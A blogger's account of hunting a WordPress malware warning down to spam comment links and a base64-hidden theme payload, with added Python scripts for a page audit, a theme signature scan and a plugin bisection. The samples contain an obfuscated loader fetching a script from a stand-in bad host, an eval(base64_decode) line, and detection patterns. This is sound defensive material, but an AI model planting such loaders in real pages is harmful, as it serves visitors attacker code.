WordPress infected with javascript malware – FIX

On 7 December, 2012 by Carol

Update 2: Fixed at last

I think being stubborn and not accepting defeat over a possibly hacked or hijacked website is a good quality to have, and I am stubborn.

Time and time again I thought I had found the fix, but on every scan my blogs were displaying the same links.
I then scanned my pages with http://jsunpack.jeek.org and got a bunch of decoded code back, in which I could see links being rendered, the same links that had been flagged as malware. This is an example of what I had:

[Screenshot: the hidden code as decoded by jsunpack]

But where on Earth was it? I could see it in the decoded output, but I couldn't find the file it lived in so that I could remove it.

I removed my current themes and installed a default WP theme. I ran the scans again with http://www.unmaskparasites.com/ (it caches results, so you can only get a fresh scan after one hour) and http://jsunpack.jeek.org. The bastard was still there and I was so pissed.
Sucuri wasn't reliable any more either: I had to run the scan several times before it showed a result, 5 times clean, 1 time infected.
So it wasn't the theme.
I checked almost all the WP PHP files, the theme files, looked for oddly named files, and went through the database. Nothing. At this point I felt like pulling my hair out.

On the tens of websites I looked at, everyone was pointing to the same thing: back up, fix your passwords, reinstall WP.
Or, what I mainly saw was: go to Sucuri and let them remove it for you for a fee.
No problem, but if they can do it, I can do it too, or at least I can try.

So I refused to believe this was a one-way street where only the experts at Sucuri could help me, and tried a different approach: isolate the problem and see whether the bad code was in my posts or in the WP files. I did the following:

1) Exported my posts and pages only, via my dashboard, plus a copy of the Uploads folder under wp-content (just in case I had to reinstall WP).
2) Created an extra subdomain via my cPanel.
3) Installed a fresh WordPress on that subdomain via Softaculous (my host has a ton of goodies).
4) Imported my posts and pages into the new subdomain.
5) Checked with the two scanners, jsunpack.jeek.org and unmaskparasites.com. Clean!

[Screenshot: the plugins page of the Politics blog]
I repeated the steps with my Politics blog. Scanned. Clean.
This time I did step 6 on my test subdomain: installed a few plugins. Scanned. Infected! Son of a biscuit!
[Screenshot: the embedded code as caught by the scan]

It was late, so I had to call it quits once more.

This morning I picked up where I left off and discovered something by accident.
I was messing with the plugins on my main blog and saw that my Disqus plugin was not showing on the posts.
I looked in the dashboard and, call it attention span, luck or whatever, jumped to the comments and started removing the spam ones. And what do you know? All the links appearing on my blog that had been flagged as malware were coming from links inserted into the Disqus comments; going by their names, they were the same ones appearing in my blog's source.
I immediately deleted them and changed the link setting in Disqus to "Comments containing links must be approved before they are published." Then I ran a scan without Disqus and bam! Clean.

The thing is that Disqus inserts its code into the WordPress footer, so I guess that is why the links from the comments showed up in my page source and got flagged.

Conclusion:

My original finding that the problem came from the plugins was partially correct, but I didn't look further and deeper into it.
Instead, I hunted for something that was not even there.
It is true that one of my themes contained a bad hack (a base64_ encoded payload), but I had had that theme for a long time and for some odd reason never had problems with it. It still had to go; that is what Update 1 below is about.
My blogs are now clean and I couldn't be happier.

If that happens to you, follow the 6 steps I did to isolate the problem and see where the infected files might be.
Once you have, check the plugins one by one. If you use Disqus, check the comments for spam that hasn't been caught yet.
If you have links displayed like I did, then it is probably not a hack. A scan with the tools linked in this post should help you see that.

If the code is in a file, or in a post as I had it once before, then unmaskparasites.com will point you to that file. It will also help you recognise your own links, or at least the legitimate links on your website.
If not, then you are dealing with hidden ads or, as in my case, spam comments, which makes it very difficult to look in the right places.
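The "recognise your own links" step can be done locally, so you are not at the mercy of a scanner's one-hour cache. The script below is an added example and is not from the original post: it pulls every script, iframe, link, anchor and image reference out of a saved copy of your page, flags the ones whose host is not on your own allowlist, and flags inline scripts that carry common obfuscation markers (the kind of thing jsunpack decodes). The allowlist, the marker list and the sample page are all my own assumptions; the page is constructed to look like the situation described above, with spam links in the comments block and the Disqus embed in the footer.

```python
from html.parser import HTMLParser
from urllib.parse import urlparse
import re

# Hosts that belong in this site's output. Assumption: the blog is example.com and
# the comment embed comes from disqus.com; adjust to your own domains.
ALLOWED_HOSTS = {"example.com", "disqus.com"}

# Markers of obfuscated inline JavaScript. Assumption: a short list of my own in the
# spirit of what jsunpack decodes; a hit is a lead to inspect, not a verdict.
OBFUSCATION_MARKERS = (
    re.compile(r"eval\s*\(\s*(?:unescape|function)\s*\("),
    re.compile(r"document\.write\s*\(\s*unescape\s*\("),
    re.compile(r"String\.fromCharCode\s*\("),
    re.compile(r"(?:\\x[0-9a-fA-F]{2}){8,}"),
)


class ResourceCollector(HTMLParser):
    """Collects every script/iframe/link/anchor/img reference and every inline script body."""

    REF_TAGS = {"script", "iframe", "a", "link", "img"}

    def __init__(self):
        super().__init__()
        self.refs = []      # (tag, attribute, url)
        self.inline = []    # bodies of <script> elements without src
        self._buf = None    # None unless we are inside an inline <script>

    def handle_starttag(self, tag, attrs):
        attrs = dict(attrs)
        if tag in self.REF_TAGS:
            for attr in ("src", "href"):
                if attrs.get(attr):
                    self.refs.append((tag, attr, attrs[attr]))
        if tag == "script" and not attrs.get("src"):
            self._buf = []

    def handle_data(self, data):
        if self._buf is not None:
            self._buf.append(data)

    def handle_endtag(self, tag):
        if tag == "script" and self._buf is not None:
            self.inline.append("".join(self._buf))
            self._buf = None


def host_allowed(host, allowed):
    """True for an allowed host or any subdomain of it (example.disqus.com under disqus.com)."""
    host = host.lower()
    return any(host == a or host.endswith("." + a) for a in allowed)


def audit(html, allowed=ALLOWED_HOSTS):
    """Return references to foreign hosts and inline scripts carrying obfuscation markers."""
    parser = ResourceCollector()
    parser.feed(html)
    parser.close()
    foreign = []
    for tag, attr, url in parser.refs:
        host = urlparse(url).hostname
        if host and not host_allowed(host, allowed):   # relative URLs are same-origin
            foreign.append((tag, attr, url))
    suspicious = [body for body in parser.inline
                  if any(rx.search(body) for rx in OBFUSCATION_MARKERS)]
    return {"foreign": foreign, "suspicious_inline": suspicious}


# Constructed sample page: a normal post, a comments block carrying two spam links,
# the Disqus embed in the footer, and one obfuscated inline loader.
SAMPLE_PAGE = """<html><body>
<a href="/about/">About</a>
<a href="http://www.example.com/2012/12/some-post/">Another post</a>
<img src="/wp-content/uploads/2012/12/photo.jpg">
<div id="comments">
  <p>Great post! <a href="http://cheap-pills.example.net/buy">cheap pills</a></p>
  <p><a href="http://casino-spam.example.org/">play now</a></p>
</div>
<script type="text/javascript" src="http://example.disqus.com/embed.js"></script>
<script>document.write(unescape('%3Cscript src=%22http://bad.example.org/a.js%22%3E%3C/script%3E'));</script>
</body></html>"""

if __name__ == "__main__":
    report = audit(SAMPLE_PAGE)
    for tag, attr, url in report["foreign"]:
        print(f"foreign {tag}[{attr}]: {url}")
    for body in report["suspicious_inline"]:
        print("suspicious inline script:", body[:60], "...")
```

Run it against `curl -s http://yourblog/ > page.html` rather than the dashboard's editor view, because the remote scanners judge the rendered page, footer and comment widgets included. Every foreign anchor it lists is then something you either recognise (a blogroll link, an affiliate) or go looking for in the comments, widgets and plugins; the same goes for any foreign script or iframe, which is where a real injection would show up.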

Reliable (helpful) tools, in this order:

  1. unmaskparasites.com
  2. jsunpack.jeek.org
  3. THEME AUTHENTICITY CHECKER  (TAC)
  4. quttera.com
  5. sitecheck.sucuri.net/scanner

As for the steps to take… well, it all depends on your problem and your website's security.
Just make sure you have a backup, in case things go bad.


–End of update 2–

Update 1:
I was a bit… enthusiastic about disabling the plugins, so I had to do some further searching and found something.

If disabling the plugins doesn't help, then I suggest installing THEME AUTHENTICITY CHECKER (TAC) and letting it scan the installed themes for bad code.
This is what I found: my themes contained bad code, the same code I had been hunting for to remove the malware from this blog.
Once you find the bad theme, remove it and check again with TAC and then with Sucuri.
[Screenshot: the code TAC found in the theme]

You might also want to scan your site with http://quttera.com/ and see if there are scripts that need to be deleted.
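What TAC does is, at bottom, a signature grep over the theme files, and it is worth being able to do the same thing yourself across every theme and plugin directory, including ones TAC does not cover. The script below is an added example, not part of the original post and not TAC's own code: it walks a directory, reports every line that hits a small signature list (base64_decode, eval, gzinflate, str_rot13, create_function, and any long base64 string literal), and demonstrates itself on a constructed sample theme whose footer.php carries a base64-hidden payload. The signature list and the sample files are my own assumptions; the "payload" is harmless filler text and is never executed.

```python
import base64
import os
import re
import tempfile

# Signatures in the spirit of what Theme Authenticity Checker looks for. Assumption: this
# is my own short selection; treat a hit as a lead to inspect, not a verdict.
SIGNATURES = {
    "base64_decode": re.compile(r"\bbase64_decode\s*\("),
    "eval": re.compile(r"\beval\s*\("),
    "gzinflate/gzuncompress": re.compile(r"\bgz(?:inflate|uncompress)\s*\("),
    "str_rot13": re.compile(r"\bstr_rot13\s*\("),
    "create_function": re.compile(r"\bcreate_function\s*\("),
    "long base64 blob": re.compile(r"['\"][A-Za-z0-9+/]{120,}={0,2}['\"]"),
}

SCAN_EXTENSIONS = (".php", ".js")


def scan_tree(root):
    """Walk a theme (or plugin) directory and return sorted (relative path, line, signature) hits."""
    hits = []
    for dirpath, _, filenames in os.walk(root):
        for name in filenames:
            if not name.endswith(SCAN_EXTENSIONS):
                continue
            path = os.path.join(dirpath, name)
            with open(path, encoding="utf-8", errors="replace") as fh:
                for lineno, line in enumerate(fh, start=1):
                    for label, rx in SIGNATURES.items():
                        if rx.search(line):
                            hits.append((os.path.relpath(path, root), lineno, label))
    return sorted(hits)


def build_sample_theme(root):
    """Constructed sample theme: two clean files and a footer carrying an injected,
    base64-hidden payload. The payload is harmless filler text, never executed."""
    filler = base64.b64encode(b"constructed filler, not a real payload; " * 5).decode()
    files = {
        "index.php": "<?php get_header(); ?>\n"
                     "<?php while (have_posts()) : the_post(); the_content(); endwhile; ?>\n"
                     "<?php get_footer(); ?>\n",
        "footer.php": "<?php wp_footer(); ?>\n"
                      "<?php eval(base64_decode('" + filler + "')); ?>\n"
                      "</body></html>\n",
        "js/theme.js": "document.addEventListener('DOMContentLoaded', function () {});\n",
    }
    for rel, content in files.items():
        path = os.path.join(root, rel)
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with open(path, "w", encoding="utf-8") as fh:
            fh.write(content)


def demo():
    """Build the sample theme in a temporary directory and scan it."""
    with tempfile.TemporaryDirectory() as root:
        build_sample_theme(root)
        return scan_tree(root)


if __name__ == "__main__":
    for path, lineno, label in demo():
        print(f"{path}:{lineno}: {label}")
```

Point `scan_tree` at `wp-content/themes` and `wp-content/plugins` and read every hit. A few legitimate themes and plugins do use base64_decode, which is exactly why TAC shows you the code instead of deleting it; the decisive check is a `diff -r` of the flagged theme or plugin against a pristine copy downloaded from wordpress.org, where an injected line stands out and a false positive disappears.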

—–

Early yesterday I logged into my WordPress dashboard to write a post and saw that a few plugins needed updating.
Without even looking at which ones required the update, I just hit the button and it updated them.
Then I opened my blog, only to get a warning from my antivirus that there was a malware infection on it.
The weird thing is that right before I updated the plugins my blog was just fine, but I really didn't connect it to the updates I had just done.
There are 2 websites that are really useful in such a situation:
http://sitecheck.sucuri.net/scanner/
http://www.unmaskparasites.com/

They both scan websites for malware and can be useful. But don't be fooled.
The first one displays the JavaScript it flagged as malware and the second one displays all scripts, so you still need to find the rest on your own.
Nevertheless, they are both very helpful.

This is what i got with Sucuri:

[Screenshot: the Sucuri scan result]

And so, terrified at the thought that I might get my visitors infected, I started googling the issue. I saw so many websites, all advising the same: check this, check that, run an SQL search… And so I did them all and nothing helped.

Hours and hours of looking and checking, installing new security plugins, scanning, and every time, after thinking I had fixed it and refreshing the cache, I got the same warning.
It frustrated the daylights out of me and finally, at 2 am, I called it quits.

At 10 this morning I started my search again.
Nobody, on any of the links I visited, gives a clear explanation. It all seems a big maybe, and they all eventually advise you to back up, remove everything and reinstall WordPress.

My advice to you is DON'T do that just yet. Not until you understand whether you have been hacked or whether it is a plugin injecting code.

As it turns out, it was one of my plugins causing it, and even though I don't know, for now, which one is the cause, I will find it.

The fix:
If you get a warning that your WordPress is infected, go to http://sitecheck.sucuri.net/scanner/ and do a scan.
If you get something similar to my shot above (the link will probably be different), then go to your active plugins and bulk-disable them all.
In my case, I left 3 active. Wordfence Security was still running a scan, and because I installed it after I got the issue, it couldn't have been the cause.
Dunno why I left the other 2 on though…

[Screenshot: the plugins page with most plugins disabled]

Anyway…
After disabling all the others, I went to http://sitecheck.sucuri.net/scanner/ and scanned again, and this time it came back clean.
[Screenshot: the clean Sucuri scan result]

Yesterday I thought I had been hacked and was this close to going through a huge amount of work to reinstall WP, only to find out that it was one of my plugins injecting code.

I am now left with 42 plugins to check to see which one misbehaves.
[Screenshot: the full plugins list]
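Checking 42 plugins one at a time means 42 scans, and with the scanners caching results for an hour that is days of work. Halving the active set each round finds a single misbehaving plugin in about seven scans. The function below is an added example and not code from the original post: `find_culprit` takes the plugin list and a callback that activates exactly the given subset, rescans, and reports whether the site is still flagged. The `SimulatedScanner` stand-in, the 42 constructed plugin names and the choice of plugin-29 as the constructed culprit are my own assumptions so the block runs offline; in real use the callback would deactivate everything, activate the subset, purge the site cache and hit the scanner.

```python
def find_culprit(plugins, scan_is_infected):
    """Group-test a plugin list for the single plugin whose activation trips the scanner.

    scan_is_infected(active) must leave exactly the plugins in `active` enabled, trigger a
    fresh scan, and return True if the site is flagged. Assumes one responsible plugin.
    Returns None if the full set does not reproduce the problem (plugins are not the cause)
    or if the final candidate does not reproduce it alone (a plugin interaction, or noise).
    """
    candidates = list(plugins)
    if not candidates or not scan_is_infected(candidates):
        return None
    while len(candidates) > 1:
        mid = len(candidates) // 2
        first, second = candidates[:mid], candidates[mid:]
        # If the first half reproduces it, the culprit is there; otherwise it is in the rest.
        candidates = first if scan_is_infected(first) else second
    # Confirm the survivor on its own before blaming it.
    return candidates[0] if scan_is_infected(candidates) else None


class SimulatedScanner:
    """Constructed stand-in for 'deactivate all, activate this subset, rescan'.
    Assumption: plugin-29 is the culprit; the object also counts scans performed."""

    def __init__(self, culprit):
        self.culprit = culprit
        self.scans = 0

    def __call__(self, active):
        self.scans += 1
        return self.culprit in active


PLUGINS = [f"plugin-{n:02d}" for n in range(1, 43)]   # 42 constructed names, as in the post


def demo():
    """Run the search against the simulated scanner; returns (culprit found, scans used)."""
    scanner = SimulatedScanner("plugin-29")
    found = find_culprit(PLUGINS, scanner)
    return found, scanner.scans


if __name__ == "__main__":
    found, scans = demo()
    print(f"culprit: {found} after {scans} scans instead of {len(PLUGINS)}")
```

With WP-CLI on the host, the callback is a `wp plugin deactivate --all` followed by `wp plugin activate` with the subset's slugs, then a cache purge and a scan. Keep the plugin activation order noted somewhere, because the search leaves the site in whatever state the last scan needed. If the final confirmation fails and `None` comes back, the flag is not caused by any one plugin, which is exactly the case described in Update 2 above, where the offending links were in the comments rather than in plugin code.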

Hope this helped!
